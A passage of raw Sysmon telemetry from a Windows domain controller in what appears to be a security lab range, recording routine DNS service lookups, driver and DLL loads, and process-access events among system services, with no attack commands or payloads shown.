;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.414{08A6967A-4286-6000-0B00-000000009A01}852attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.412{08A6967A-4288-6000-1500-000000009A01}1324eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.412{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.406{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.396{08A6967A-4288-6000-1500-000000009A01}1324eu-central-1.compute.internal9502-C:\Windows\System32\svchost.exe 22542200x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:07.921{08A6967A-4298-6000-3500-000000009A01}2988win-dc-250.attackrange.local0fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:07.919{08A6967A-4286-6000-0B00-000000009A01}852WIN-DC-2500fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 644600x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:25.385C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 22542200x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.518{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.516{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.515{08A6967A-4286-6000-0B00-000000009A01}852ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.513{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.508{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.503{08A6967A-4286-6000-0B00-000000009A01}852DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.499{08A6967A-4286-6000-0B00-000000009A01}852_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.495{08A6967A-4286-6000-0B00-000000009A01}852_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.490{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.486{08A6967A-4286-6000-0B00-000000009A01}852_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.481{08A6967A-4286-6000-0B00-000000009A01}852_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.477{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.472{08A6967A-4286-6000-0B00-000000009A01}852_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.468{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:08.465{08A6967A-4286-6000-0B00-000000009A01}852_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 734700x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.557{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\System32\lsass.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.603{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:07.961{08A6967A-4298-6000-3500-000000009A01}2988C:\Windows\System32\dns.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:10.696{08A6967A-4288-6000-1200-000000009A01}1232attackrange.local9502-C:\Windows\System32\svchost.exe 734700x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:29.025{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\System32\svchost.exeC:\Windows\System32\NetSetupSvc.dll10.0.14393.3503 (rs1_release.200131-0410)Network Setup ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationNETSETUPSVC.DLLMD5=4B455FA2A15BE4C278D0D655A7EA9543,SHA256=1C04ABE14400CC4175704B08D008454820BBF14BFECE1934A82756A6037E681B,IMPHASH=14F8BB5E943EA23F79CC3EC6B8C493FBtrueMicrosoft WindowsValid 10341000x80000000000000002801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4288-6000-1000-000000009A01}11361216C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4288-6000-1000-000000009A01}11361216C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.992{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.977{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:15.977{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+396a|c:\windows\system32\SYSNTFY.dll+1fc3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+52568|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 